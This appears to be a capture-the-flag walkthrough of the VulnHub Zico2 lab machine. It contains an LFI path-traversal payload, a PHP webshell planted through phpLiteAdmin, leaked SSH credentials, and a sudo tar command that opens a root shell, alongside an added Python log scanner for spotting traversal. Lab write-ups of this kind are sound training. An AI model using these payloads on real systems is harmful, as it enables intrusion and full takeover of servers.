VulnHub Zico2: 1 Walkthrough


Nmap

I found that this target has only 3 open ports (22 SSH, 80 HTTP, and 111 RPC). I started with the HTTP port by browsing the website hosted on this web server.

HTTP – Port 80

I found view.php linked from the home page.

The "Check them out" button links to /view.php?page=tools.html, which means LFI may work.

URL : /view.php?page=../../../../../etc/passwd

So far I had LFI. I enumerated with it but found nothing interesting, so I ran dirb.

In the dbadmin folder, phpLiteAdmin v1.9.3 is running.

I logged in by guessing the default password: admin

Searching for exploit

Exploit Link : https://www.exploit-db.com/exploits/24044

Using this exploit, I successfully exploited phpLiteAdmin to get a shell.

Exploiting phpLiteAdmin

Steps, according to the exploit:

  1. Create a new database named "hack.php"
  2. Now create a new table in this database and insert a text field with the default value: <?php echo system($_GET["cmd"]); ?>

phpLiteAdmin reveals the full path of the PHP script.

Default Value : <?php echo system($_GET["cmd"]); ?>

Now, to call the shell, remember the LFI found earlier. The shell can easily be called from there.

URL : view.php?page=../../usr/databases/hack.php&cmd=id
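From the defender's side, both view.php requests in this walkthrough (the /etc/passwd read and the include of the database file) share one trait: the page value resolves outside the web root. The following is an added example, not part of the original walkthrough, that flags such requests in an access log; the web root path, the log format and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/var/www"  # assumption: directory view.php includes from
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo repeated URL-encoding (%252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_root(page, root=WEB_ROOT):
    """True if the include target resolves outside the web root."""
    page = decode_fully(page).replace("\\", "/")
    target = posixpath.normpath(posixpath.join(root, page))
    return not (target == root or target.startswith(root + "/"))

def suspicious_requests(log_lines):
    """Return (line_no, decoded page value) for view.php requests leaving the root."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/view.php"):
            continue
        for page in parse_qs(url.query).get("page", []):  # parse_qs decodes once
            if escapes_root(page):
                hits.append((n, decode_fully(page)))
    return hits

# Constructed access-log lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 8355',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1220',
    '192.0.2.10 - - [01/Jan/2024:10:05:00 +0000] "GET /view.php?page=../../usr/databases/hack.php&cmd=id HTTP/1.1" 200 310',
    '192.0.2.10 - - [01/Jan/2024:10:06:00 +0000] "GET /view.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:07:00 +0000] "GET /dbadmin/ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for n, page in suspicious_requests(SAMPLE_LOG):
        print(f"line {n}: page={page!r} resolves outside {WEB_ROOT}")
```

The same resolve-then-compare check, applied inside view.php before the include, is what closes the LFI; an allowlist of page names is stricter still.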

Using this LFI, I found the "zico" user's home directory, in which there is a wordpress directory containing the username and password, which can be used to connect over SSH.

Username : zico
Password : sWfCsfJSPV9H3AmQzw8

Privilege Escalation (tar)

I can run the tar and zip commands as root without any password.

Using tar to escalate privileges

Command : sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Reading the root flag
